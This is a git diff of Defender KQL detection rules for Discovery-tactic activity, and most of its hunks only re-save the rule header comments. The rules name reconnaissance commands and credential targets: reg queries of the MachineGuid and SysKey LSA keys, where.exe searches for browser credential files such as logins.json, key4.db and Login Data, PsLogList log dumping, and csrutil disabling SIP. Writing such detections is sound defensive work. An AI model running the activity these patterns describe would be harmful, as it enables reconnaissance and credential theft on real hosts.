"\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or InitiatingProcessFolderPath endswith "\\maxthon.exe" or InitiatingProcessFolderPath endswith "\\opera.exe" or InitiatingProcessFolderPath endswith "\\safari.exe" or InitiatingProcessFolderPath endswith "\\seamonkey.exe" or InitiatingProcessFolderPath endswith "\\vivaldi.exe" or InitiatingProcessFolderPath endswith "\\whale.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_query_of_machineguid.kql b/KQL/rules/Discovery/suspicious_query_of_machineguid.kql
index 34ef9ca1..757bb1ad 100644
--- a/KQL/rules/Discovery/suspicious_query_of_machineguid.kql
+++ b/KQL/rules/Discovery/suspicious_query_of_machineguid.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Query of MachineGUID
-// Author: frack113
-// Date: 2022-01-01
-// Level: low
-// Description: Use of reg to get MachineGuid information
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-
-DeviceProcessEvents
+// Title: Suspicious Query of MachineGUID
+// Author: frack113
+// Date: 2022-01-01
+// Level: low
+// Description: Use of reg to get MachineGuid information
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Cryptography" and ProcessCommandLine contains "/v " and ProcessCommandLine contains "MachineGuid") and FolderPath endswith "\\reg.exe"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql b/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql
index f6ee94f0..b4a46a64 100644
--- a/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql
+++ b/KQL/rules/Discovery/suspicious_reconnaissance_activity_using_get_localgroupmember_cmdlet.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-10-10
-// Level: medium
-// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087.001
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-10-10
+// Level: medium
+// Description: Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087.001
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Get-LocalGroupMember " and (ProcessCommandLine contains "domain admins" or ProcessCommandLine contains " administrator" or ProcessCommandLine contains " administrateur" or ProcessCommandLine contains "enterprise admins" or ProcessCommandLine contains "Exchange Trusted Subsystem" or ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql b/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
index 80dedcc3..d9a19b81 100644
--- a/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
+++ b/KQL/rules/Discovery/suspicious_reconnaissance_activity_via_gathernetworkinfo_vbs.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-02-08
-// Level: high
-// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
-
-DeviceProcessEvents
+// Title: Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-02-08
+// Level: high
+// Description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.execution, attack.t1615, attack.t1059.005
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "gatherNetworkInfo.vbs" and (not((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_use_of_psloglist.kql b/KQL/rules/Discovery/suspicious_use_of_psloglist.kql
index 0a7c5893..b33a447b 100644
--- a/KQL/rules/Discovery/suspicious_use_of_psloglist.kql
+++ b/KQL/rules/Discovery/suspicious_use_of_psloglist.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Use of PsLogList
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-12-18
-// Level: medium
-// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002
-// False Positives:
-// - Another tool that uses the command line switches of PsLogList
-// - Legitimate use of PsLogList by an administrator
-
-DeviceProcessEvents
+// Title: Suspicious Use of PsLogList
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-18
+// Level: medium
+// Description: Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or delete events logs
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087, attack.t1087.001, attack.t1087.002
+// False Positives:
+// - Another tool that uses the command line switches of PsLogList
+// - Legitimate use of PsLogList by an administrator
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " security" or ProcessCommandLine contains " application" or ProcessCommandLine contains " system") and (ProcessCommandLine contains " -d" or ProcessCommandLine contains " /d" or ProcessCommandLine contains " –d" or ProcessCommandLine contains " —d" or ProcessCommandLine contains " ―d" or ProcessCommandLine contains " -x" or ProcessCommandLine contains " /x" or ProcessCommandLine contains " –x" or ProcessCommandLine contains " —x" or ProcessCommandLine contains " ―x" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " /c" or ProcessCommandLine contains " –c" or ProcessCommandLine contains " —c" or 
ProcessCommandLine contains " ―c" or ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g" or ProcessCommandLine contains " –g" or ProcessCommandLine contains " —g" or ProcessCommandLine contains " ―g") and (ProcessVersionInfoOriginalFileName =~ "psloglist.exe" or (FolderPath endswith "\\psloglist.exe" or FolderPath endswith "\\psloglist64.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/suspicious_where_execution.kql b/KQL/rules/Discovery/suspicious_where_execution.kql
index d2a72589..dea00dd8 100644
--- a/KQL/rules/Discovery/suspicious_where_execution.kql
+++ b/KQL/rules/Discovery/suspicious_where_execution.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Where Execution
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-12-13
-// Level: low
-// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
-// Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
-// internal network resources such as servers, tools/dashboards, or other related infrastructure.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1217
-
-DeviceProcessEvents
+// Title: Suspicious Where Execution
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-12-13
+// Level: low
+// Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts.
+// Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about
+// internal network resources such as servers, tools/dashboards, or other related infrastructure.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1217
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\where.exe" or ProcessVersionInfoOriginalFileName =~ "where.exe") and (ProcessCommandLine contains "places.sqlite" or ProcessCommandLine contains "cookies.sqlite" or ProcessCommandLine contains "formhistory.sqlite" or ProcessCommandLine contains "logins.json" or ProcessCommandLine contains "key4.db" or ProcessCommandLine contains "key3.db" or ProcessCommandLine contains "sessionstore.jsonlz4" or ProcessCommandLine contains "History" or ProcessCommandLine contains "Bookmarks" or ProcessCommandLine contains "Cookies" or ProcessCommandLine contains "Login Data")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/syskey_registry_keys_access.kql b/KQL/rules/Discovery/syskey_registry_keys_access.kql
index ddeba016..ddf7c896 100644
--- a/KQL/rules/Discovery/syskey_registry_keys_access.kql
+++ b/KQL/rules/Discovery/syskey_registry_keys_access.kql
@@ -1,10 +1,10 @@
-// Title: SysKey Registry Keys Access
-// Author: Roberto Rodriguez @Cyb3rWard0g
-// Date: 2019-08-12
-// Level: high
-// Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1012
-
-DeviceRegistryEvents
+// Title: SysKey Registry Keys Access
+// Author: Roberto Rodriguez @Cyb3rWard0g
+// Date: 2019-08-12
+// Level: high
+// Description: Detects handle requests and access operations to specific registry keys to calculate the SysKey
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1012
+
+DeviceRegistryEvents
 | where RegistryKey endswith "lsa\\JD" or RegistryKey endswith "lsa\\GBG" or RegistryKey endswith "lsa\\Skew1" or RegistryKey endswith "lsa\\Data"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql b/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
index b85dbb89..8b36d4fa 100644
--- a/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
+++ b/KQL/rules/Discovery/sysmon_discovery_via_default_driver_altitude_using_findstr_exe.kql
@@ -1,10 +1,10 @@
-// Title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
-// Author: frack113
-// Date: 2021-12-16
-// Level: high
-// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1518.001
-
-DeviceProcessEvents
+// Title: Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE
+// Author: frack113
+// Date: 2021-12-16
+// Level: high
+// Description: Detects usage of "findstr" with the argument "385201". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains " 385201" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery.kql b/KQL/rules/Discovery/system_information_discovery.kql
index cc756587..0ba5ef2c 100644
--- a/KQL/rules/Discovery/system_information_discovery.kql
+++ b/KQL/rules/Discovery/system_information_discovery.kql
@@ -1,12 +1,12 @@
-// Title: System Information Discovery
-// Author: Ömer Günal, oscd.community
-// Date: 2020-10-08
-// Level: informational
-// Description: Detects system information discovery commands
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: System Information Discovery
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-08
+// Level: informational
+// Description: Detects system information discovery commands
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/uname" or FolderPath endswith "/hostname" or FolderPath endswith "/uptime" or FolderPath endswith "/lspci" or FolderPath endswith "/dmidecode" or FolderPath endswith "/lscpu" or FolderPath endswith "/lsmod"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql
index 18badf3a..04e5e080 100644
--- a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql
+++ b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql
@@ -1,14 +1,14 @@
-// Title: System Information Discovery Using Ioreg
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-12-20
-// Level: medium
-// Description: Detects the use of "ioreg" which will show I/O Kit registry information.
-// This process is used for system information discovery.
-// It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-// False Positives:
-// - Legitimate administrative activities
-
-DeviceProcessEvents
+// Title: System Information Discovery Using Ioreg
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the use of "ioreg" which will show I/O Kit registry information.
+// This process is used for system information discovery.
+// It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-l" or ProcessCommandLine contains "-c") and (ProcessCommandLine contains "AppleAHCIDiskDriver" or ProcessCommandLine contains "IOPlatformExpertDevice" or ProcessCommandLine contains "Oracle" or ProcessCommandLine contains "Parallels" or ProcessCommandLine contains "USB Vendor Name" or ProcessCommandLine contains "VirtualBox" or ProcessCommandLine contains "VMware") and (FolderPath endswith "/ioreg" or ProcessCommandLine contains "ioreg")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql b/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql
index 15533619..5f7cee88 100644
--- a/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql
+++ b/KQL/rules/Discovery/system_information_discovery_using_sw_vers.kql
@@ -1,12 +1,12 @@
-// Title: System Information Discovery Using sw_vers
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2023-12-20
-// Level: medium
-// Description: Detects the use of "sw_vers" for system information discovery
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-// False Positives:
-// - Legitimate administrative activities
-
-DeviceProcessEvents
+// Title: System Information Discovery Using sw_vers
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2023-12-20
+// Level: medium
+// Description: Detects the use of "sw_vers" for system information discovery
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/sw_vers" and (ProcessCommandLine contains "-buildVersion" or ProcessCommandLine contains "-productName" or ProcessCommandLine contains "-productVersion")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql
index 2cdc3098..b8bc28ec 100644
--- a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql
+++ b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql
@@ -1,13 +1,13 @@
-// Title: System Information Discovery Using System_Profiler
-// Author: Stephen Lincoln `@slincoln_aiq` (AttackIQ)
-// Date: 2024-01-02
-// Level: medium
-// Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
-// This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001
-// False Positives:
-// - Legitimate administrative activities
-
-DeviceProcessEvents
+// Title: System Information Discovery Using System_Profiler
+// Author: Stephen Lincoln `@slincoln_aiq` (AttackIQ)
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information.
+// This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001
+// False Positives:
+// - Legitimate administrative activities
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "SPApplicationsDataType" or ProcessCommandLine contains "SPHardwareDataType" or ProcessCommandLine contains "SPNetworkDataType" or ProcessCommandLine contains "SPUSBDataType") and (FolderPath endswith "/system_profiler" or ProcessCommandLine contains "system_profiler")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql b/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql
index 70672c0e..cd3d4b91 100644
--- a/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql
+++ b/KQL/rules/Discovery/system_information_discovery_via_registry_queries.kql
@@ -1,12 +1,12 @@
-// Title: System Information Discovery via Registry Queries
-// Author: lazarg
-// Date: 2025-06-12
-// Level: low
-// Description: Detects attempts to query system information directly from the Windows Registry.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1082
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: System Information Discovery via Registry Queries
+// Author: lazarg
+// Date: 2025-06-12
+// Level: low
+// Description: Detects attempts to query system information directly from the Windows Registry.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1082
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "Get-ItemPropertyValue" or ProcessCommandLine contains "gpv") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (ProcessCommandLine contains "query" and (ProcessCommandLine contains "-v" or ProcessCommandLine contains "/v" or ProcessCommandLine contains "–v" or ProcessCommandLine contains "—v" or ProcessCommandLine contains "―v") and FolderPath endswith "\\reg.exe")) and (ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\Interfaces" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows Defender" or ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Services" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Schedule\\TaskCache\\Tasks")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql
index 3ef42ec5..5166b100 100644
--- a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql
+++ b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql
@@ -1,10 +1,10 @@
-// Title: System Integrity Protection (SIP) Disabled
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024-01-02
-// Level: medium
-// Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1518.001
-
-DeviceProcessEvents
+// Title: System Integrity Protection (SIP) Disabled
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "disable" and FolderPath endswith "/csrutil"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql
index 400f1fad..06cdc475 100644
--- a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql
+++ b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql
@@ -1,12 +1,12 @@
-// Title: System Integrity Protection (SIP) Enumeration
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024-01-02
-// Level: low
-// Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1518.001
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: System Integrity Protection (SIP) Enumeration
+// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
+// Date: 2024-01-02
+// Level: low
+// Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1518.001
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "status" and FolderPath endswith "/csrutil"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_connections_discovery_linux.kql b/KQL/rules/Discovery/system_network_connections_discovery_linux.kql
index 1847f896..d96b0811 100644
--- a/KQL/rules/Discovery/system_network_connections_discovery_linux.kql
+++ b/KQL/rules/Discovery/system_network_connections_discovery_linux.kql
@@ -1,12 +1,12 @@
-// Title: System Network Connections Discovery - Linux
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2020-10-19
-// Level: low
-// Description: Detects usage of system utilities to discover system network connections
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1049
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: System Network Connections Discovery - Linux
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: low
+// Description: Detects usage of system utilities to discover system network connections
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where (FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat") and (not((FolderPath endswith "/who" and InitiatingProcessCommandLine contains "/usr/bin/landscape-sysinfo")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_connections_discovery_macos.kql b/KQL/rules/Discovery/system_network_connections_discovery_macos.kql
index fbd98d19..d47ce49d 100644
--- a/KQL/rules/Discovery/system_network_connections_discovery_macos.kql
+++ b/KQL/rules/Discovery/system_network_connections_discovery_macos.kql
@@ -1,12 +1,12 @@
-// Title: System Network Connections Discovery - MacOs
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2020-10-19
-// Level: informational
-// Description: Detects usage of system utilities to discover system network connections
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1049
-// False Positives:
-// - Legitimate activities
-
-DeviceProcessEvents
+// Title: System Network Connections Discovery - MacOs
+// Author: Daniil Yugoslavskiy, oscd.community
+// Date: 2020-10-19
+// Level: informational
+// Description: Detects usage of system utilities to discover system network connections
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+// False Positives:
+// - Legitimate activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/who" or FolderPath endswith "/w" or FolderPath endswith "/last" or FolderPath endswith "/lsof" or FolderPath endswith "/netstat"
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql b/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql
index 563ac286..03433c29 100644
--- a/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql
+++ b/KQL/rules/Discovery/system_network_connections_discovery_via_net_exe.kql
@@ -1,10 +1,10 @@
-// Title: System Network Connections Discovery Via Net.EXE
-// Author: frack113
-// Date: 2021-12-10
-// Level: low
-// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1049
-
-DeviceProcessEvents
+// Title: System Network Connections Discovery Via Net.EXE
+// Author: frack113
+// Date: 2021-12-10
+// Level: low
+// Description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1049
+
+DeviceProcessEvents
 | where ((ProcessCommandLine endswith " use" or ProcessCommandLine endswith " sessions") or (ProcessCommandLine contains " use " or ProcessCommandLine contains " sessions ")) and ((FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe") or (ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe")))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_discovery_linux.kql b/KQL/rules/Discovery/system_network_discovery_linux.kql
index 0ea2b4b4..1591d667 100644
--- a/KQL/rules/Discovery/system_network_discovery_linux.kql
+++ b/KQL/rules/Discovery/system_network_discovery_linux.kql
@@ -1,12 +1,12 @@
-// Title: System Network Discovery - Linux
-// Author: Ömer Günal and remotephone, oscd.community
-// Date: 2020-10-06
-// Level: informational
-// Description: Detects enumeration of local network configuration
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1016
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: System Network Discovery - Linux
+// Author: Ömer Günal and remotephone, oscd.community
+// Date: 2020-10-06
+// Level: informational
+// Description: Detects enumeration of local network configuration
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/etc/resolv.conf" or (FolderPath endswith "/firewall-cmd" or FolderPath endswith "/ufw" or FolderPath endswith "/iptables" or FolderPath endswith "/netstat" or FolderPath endswith "/ss" or FolderPath endswith "/ip" or FolderPath endswith "/ifconfig" or FolderPath endswith "/systemd-resolve" or FolderPath endswith "/route")
\ No newline at end of file
diff --git a/KQL/rules/Discovery/system_network_discovery_macos.kql b/KQL/rules/Discovery/system_network_discovery_macos.kql
index acb8edf8..85bcf7b1 100644
--- a/KQL/rules/Discovery/system_network_discovery_macos.kql
+++ b/KQL/rules/Discovery/system_network_discovery_macos.kql
@@ -1,12 +1,12 @@
-// Title: System Network Discovery - macOS
-// Author: remotephone, oscd.community
-// Date: 2020-10-06
-// Level: informational
-// Description: Detects enumeration of local network configuration
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1016
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: System Network Discovery - macOS
+// Author: remotephone, oscd.community
+// Date: 2020-10-06
+// Level: informational
+// Description: Detects enumeration of local network configuration
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where ((FolderPath endswith "/arp" or FolderPath endswith "/ifconfig" or FolderPath endswith "/netstat" or FolderPath endswith "/networksetup" or FolderPath endswith "/socketfilterfw") or ((ProcessCommandLine contains "/Library/Preferences/com.apple.alf" and ProcessCommandLine contains "read") and FolderPath =~ "/usr/bin/defaults")) and (not(InitiatingProcessFolderPath endswith "/wifivelocityd"))
\ No newline at end of file
diff --git a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql
index f68dcd15..fa897cb6 100644
--- a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql
+++ b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql
@@ -1,12 +1,12 @@
-// Title: Uncommon Connection to Active Directory Web Services
-// Author: @kostastsale
-// Date: 2024-01-26
-// Level: medium
-// Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
-// MITRE Tactic: Discovery
-// Tags: attack.discovery, attack.t1087
-// False Positives:
-// - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives.
-
-DeviceNetworkEvents
+// Title: Uncommon Connection to Active Directory Web Services
+// Author: @kostastsale
+// Date: 2024-01-26
+// Level: medium
+// Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management.
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1087
+// False Positives:
+// - ADWS is used by a number of legitimate applications that need to interact with Active Directory. These applications should be added to the allow-listing to avoid false positives.
+
+DeviceNetworkEvents
